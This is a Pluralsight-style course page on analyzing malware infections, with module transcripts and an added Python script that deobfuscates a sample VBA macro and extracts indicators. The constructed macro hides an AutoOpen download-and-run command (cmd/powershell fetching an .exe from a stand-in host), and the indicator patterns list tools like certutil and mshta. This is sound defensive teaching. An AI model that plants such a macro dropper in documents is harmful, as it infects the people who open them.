Getting Started Analyzing Malware Infections

Malware infections are growing at an alarming rate. This course will teach you how to safely analyze malicious links, infected documents, and malicious archives, with a focus on gathering indicators of compromise.
Course info
Rating
(17)
Level
Beginner
Updated
Feb 8, 2017
Duration
2h 17m
Table of contents
Course Overview
Investigating Malware Infections
Analyzing Malicious Links
Dissecting Infected Documents
Analyzing Malicious Archives
Designing the Process for Analyzing Malware
Description

Computer virus outbreaks are becoming more complex and use clever deployment tactics that trick people into getting infected, even without their knowledge. Traditional antivirus technologies have a hard time keeping up. There is a need for security analysts who are able to tackle these infections and stop them from spreading to other computers. In this course, Getting Started Analyzing Malware Infections, you'll learn how to safely contain and analyze suspicious files and URLs. Next, you'll learn to extract malicious scripts from documents, deobfuscate them, and extract indicators that lead to other malware components. Finally, you will learn to investigate virus deployment techniques that bypass modern security controls. When you're finished with this course, you will have the skills and the knowledge to build layered defenses that disrupt the infection chain at multiple stages, protecting your data and your company.
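The description above (and the "Dissecting Infected Documents" module) describes extracting scripts from Office documents, deobfuscating them, and pulling out indicators. The script below is an added example, not code from the course or its author: it applies a fixed-point loop of common VBA deobfuscation steps (Chr() resolution, StrReverse(), literal merging across `&`, inlining of variables assigned a single literal) to a constructed macro body and then extracts URL, IP and command-line indicators from the result, defanging URLs for reporting. The macro sample, the hostname `bad-example.com` and all function names are constructed for illustration; in practice the macro text would come from a tool such as olevba.

```python
import re

# Constructed sample (hypothetical, not a real sample): a VBA macro body that
# hides a download-and-execute command behind several common obfuscation tricks.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim a As String
    a = Chr(104) & Chr(116) & Chr(116) & Chr(112) & ":" & "//"
    Dim b As String
    b = StrReverse("exe.etadpu/moc.elpmaxe-dab")
    Dim c As String
    c = "cm" & "d.e" & "xe /c " & "pow" & "ershell"
    Set o = CreateObject("WScript.Shell")
    o.Run c & " " & a & b
End Sub
'''

LITERAL = r'"([^"]*)"'                      # VBA string literal (doubled quotes not handled)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)  # var = "literal"


def _resolve_chr(text):
    # Chr(104) -> "h"; Chr(34) is left alone because it would produce a bare quote.
    return re.sub(r'Chr[W$]?\((\d+)\)',
                  lambda m: m.group(0) if int(m.group(1)) == 34 else '"' + chr(int(m.group(1))) + '"',
                  text)


def _resolve_strreverse(text):
    # StrReverse("cba") -> "abc"
    return re.sub(r'StrReverse\("([^"]*)"\)', lambda m: '"' + m.group(1)[::-1] + '"', text)


def _merge_literals(text):
    # "ab" & "cd" -> "abcd", repeated until no adjacent literal pairs remain.
    pattern = re.compile(LITERAL + r'\s*(?:&|\+)\s*' + LITERAL)
    prev = None
    while text != prev:
        prev, text = text, pattern.sub(r'"\1\2"', text)
    return text


def _inline_variables(text):
    # Replace variables that hold a single literal with that literal, but only
    # outside string literals and never on the assignment or Dim lines themselves.
    values = dict(ASSIGN.findall(text))
    if not values:
        return text
    names = re.compile(r'\b(' + '|'.join(re.escape(v) for v in values) + r')\b')
    out = []
    for line in text.splitlines():
        if ASSIGN.match(line) or re.match(r'\s*Dim\b', line):
            out.append(line)
            continue
        parts = re.split(r'("[^"]*")', line)          # odd indexes are literals
        for i in range(0, len(parts), 2):
            parts[i] = names.sub(lambda m: '"' + values[m.group(1)] + '"', parts[i])
        out.append(''.join(parts))
    return '\n'.join(out)


def deobfuscate(macro):
    """Apply all passes until the text stops changing (fixed point)."""
    prev, text = None, macro
    while text != prev:
        prev = text
        text = _inline_variables(_merge_literals(_resolve_strreverse(_resolve_chr(text))))
    return text


IOC_PATTERNS = {
    "url": re.compile(r'https?://[^\s"\'<>]+', re.I),
    "ipv4": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
    "command": re.compile(r'\b(?:cmd(?:\.exe)?|powershell(?:\.exe)?|wscript|cscript|mshta'
                          r'|regsvr32|certutil|bitsadmin)\b[^"\n]*', re.I),
}


def extract_iocs(text):
    """Return sorted, de-duplicated indicators per category."""
    return {name: sorted(set(p.findall(text))) for name, p in IOC_PATTERNS.items()}


def defang(url):
    """http://evil.example/x -> hxxp://evil[.]example/x (host only), safe to paste in a report."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.lower().replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


if __name__ == "__main__":
    clean = deobfuscate(SAMPLE_MACRO)
    print(clean)
    for kind, items in extract_iocs(clean).items():
        for item in items:
            print(kind, defang(item) if kind == "url" else item)
```

The fixed-point loop matters more than any single pass: real macros chain tricks (a reversed string built from Chr() calls, stored in a variable that is concatenated later), so each pass is re-run until nothing changes. Variable inlining is deliberately limited to names holding one literal, which keeps the output readable; anything more dynamic (Mid/Replace, arithmetic on character codes, environment lookups) is the point at which the module's script-debugging approach takes over.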

About the author

Cristian is an Information Security Professional with experience in the supply chain, manufacturing, gaming, and entertainment sectors for Fortune 500 companies. He has provided expertise in incident response cases by performing forensic investigations and malware analysis, and by elaborating mitigation plans against complex cyber attacks.

More from the author
Threat Intelligence: The Big Picture
Beginner
1h 43m
Aug 3, 2017
Section Introduction Transcripts

Course Overview
Hi everyone, my name is Cristian Pascariu, and welcome to my course, Getting Started Analyzing Malware Infections. I am an information security professional. Over the years, I have gained some valuable experience in the field of malware analysis, incident response, and forensics that I want to share with you. Until a while ago, we thought of computer viruses as malicious toolbars. Nowadays we are seeing some advanced malware that can encrypt data and demand ransom in return. The main reason behind this course is to share with you a structured approach that you can make use of in tackling a wide variety of malware types and that is guaranteed to generate some actionable results. In this course, we are going to analyze computer viruses over multiple scenarios to develop better, more effective endpoint and network defenses. Some of the major topics that we will cover include generic malware behavior and indicators of malicious activity, and common delivery tactics that leverage phishing emails; we will dissect infected documents to uncover hidden malware components, we will perform static and dynamic analysis, and we will also monitor malicious network activity. By the end of this course, you'll know the right techniques for investigating malicious infections based on their type, and how to use the right tools in the analysis process. Before beginning this course, you should be familiar with basic security concepts. I hope you will join me on this journey to learn malware analysis with the Getting Started Analyzing Malware Infections course at Pluralsight.

Dissecting Infected Documents
Hello again. In this module, we'll be dissecting infected documents. Our non-technical colleagues work with them on a daily basis to support business needs. Hackers use this as an opportunity to spread computer viruses. As security analysts, we must be able to tackle these document-based infections and restore business activities to normal. We will start off this module by going over the tactics used in document-based attacks, and also how infections occur. It's really important to understand Visual Basic, as this serves as a foundation for building malware components. We'll investigate different obfuscation tactics used by hackers to hide indicators within malicious scripts that are bundled with Office documents. After that, new tools will be added to our analysis arsenal. These will help us in tackling infected documents. We'll use them to extract malicious scripts and perform static analysis. Attackers employ some advanced tactics that make indicator discovery difficult. Don't worry, we'll use script debugging to facilitate this, automating the deobfuscation and uncovering hidden indicators in a very short time, granting us the ability to spend more time on elaborating defenses. Now let's get some more details about malicious documents and how they are used to spread virus infections.

Designing the Process for Analyzing Malware
Welcome back. We have gained a lot of technical information over the past infection scenarios, and now we stand to create a process to ensure the right quality of work over multiple investigations. We will start by focusing on the bigger picture, reconstructing the infection, as this ensures we don't miss out on any hidden indicators. With experience, we notice some common stages and techniques that we use during a virus infection. We need to create analysis procedures to make sure that we don't miss anything in future investigations. The overall success of an investigation comes from avoiding common pitfalls, so we will take note of these and look at the right approach. We also have to be aware that we're not alone when it comes to protecting data, and we'll go through a list of things that are present in most organizations that can help us a lot. Also, we will look at where to start in terms of protecting our organization by working more closely with the non-technical teams as well. Up next, we will take a look at an efficient way to reconstruct an infection scenario.